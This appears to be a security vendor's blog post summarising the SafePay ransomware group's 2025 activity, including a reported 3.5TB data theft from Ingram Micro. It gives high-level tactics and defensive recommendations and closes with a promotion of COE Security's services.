A dramatic surge in ransomware activity has emerged in 2025. The SafePay group-first observed in late 2024-has quietly established itself as one of the most aggressive ransomware operations currently active. With more than 260 known victims across the US, Europe, APAC, and Latin America, SafePay is now leveraging double-extortion tactics-encrypting data and threatening to leak it.
What Happened at Ingram Micro
One of the largest victims, Ingram Micro, reportedly had 3.5TB of sensitive data exfiltrated. Although operations were restored quickly, the threat to leak confidential files underscores the power ransomware actors now wield.
SafePay’s Attack Strategy
- Gains initial access through exposed RDP/VPN, stolen credentials, or misconfigurations
- Disables security tools and deletes shadow copies
- Uses tools like ShareFinder.ps1, Rclone, and 7-Zip for data theft
- Operates independently (not RaaS), making attribution and takedown more difficult
- Targets: Manufacturing, technology, education, healthcare, logistics, finance
What This Means for You
This attack shows why ransomware groups now prioritize supply chains and service providers. Their intent is to disrupt critical operations and force compliance through fear of exposure.
Organizations should:
- Harden remote access
- Enforce MFA
- Monitor for suspicious process behavior
- Build offsite and immutable backups
- Prepare a ransomware response playbook
Conclusion
SafePay’s rapid evolution proves that ransomware is no longer just about encryption-it is about leverage, disruption, and reputational damage. It is time to treat ransomware as an enterprise-level risk.
About COE Security
At COE Security, we help secure organizations in manufacturing, technology, logistics, healthcare, education, and MSP sectors against high-impact threats like SafePay.
We offer:
- Vulnerability assessments
- Remote access and endpoint hardening
- SIEM tuning and anomaly detection
- Immutable backup strategy design
- Incident response and compliance readiness (NIST, HIPAA, GDPR, ISO 27001)
Our mission is to keep you secure, resilient, and always prepared.